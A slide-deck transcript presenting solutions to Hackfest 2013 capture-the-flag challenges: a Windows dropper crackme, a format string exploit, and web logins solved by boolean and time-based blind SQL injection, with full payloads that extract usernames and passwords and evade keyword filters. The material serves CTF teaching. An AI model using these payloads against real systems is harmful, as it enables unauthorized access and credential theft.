Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Web login and crackme's

Web login and crackme's

Solution to Web login (SQL injection) and Crack-me challenges presented at hackfest 2013 by @MrUn1k0d3r. Challenges presented at montrehack (http://montrehack.ca/).

635a75680cf026f1bf608ed3c1071c02?s=128

Olivier Bilodeau

November 18, 2013
Tweet

Other Decks in Technology

Transcript

  1. CrackMe: Windows Dropper + DLL

  2. None
  3. None
  4. CrackMe: Format String Exploit

  5. Solution: %016llx au lieu de %08x

  6. None
  7. Web: Boolean Injection SQL doesnotexist') || if(1=1, 12, 34) =

    12 # doesnotexist') || if(1=2, 12, 34) = 12 # Caractères interdit: /(union|char|sleep|benchmark)/i
  8. admin') AND IF(SUBSTRING(REVERSE(CONV(HEX(SUBSTRING((SELECT GROUP_CONCAT(username, 0x7c, password) FROM login3.users), 22, 1)),

    16, 2)), 7, 1) = 1, 3421, 6792) = 3421 #
  9. Web: Time Blind Injection SQL Caractères interdit: /(union|char|and|or\s\S|\s\S|sleep|sha1|md5|if)/i admin')/**/&&/**/benchmark(300000000,(select/**/1))/**/#

  10. admin')/**/&&/**/case/**/when/**/ (SUBSTRING(REVERSE(CONV(HEX(SUBSTRING((SELECT/**/GROUP_CONCAT(us ername,0x7c,password)/**/FROM/**/login5.users),24,1)),16,2)),7,1))=1/**/the n/**/benchmark(55000000,(select/**/1))/**/end/**/#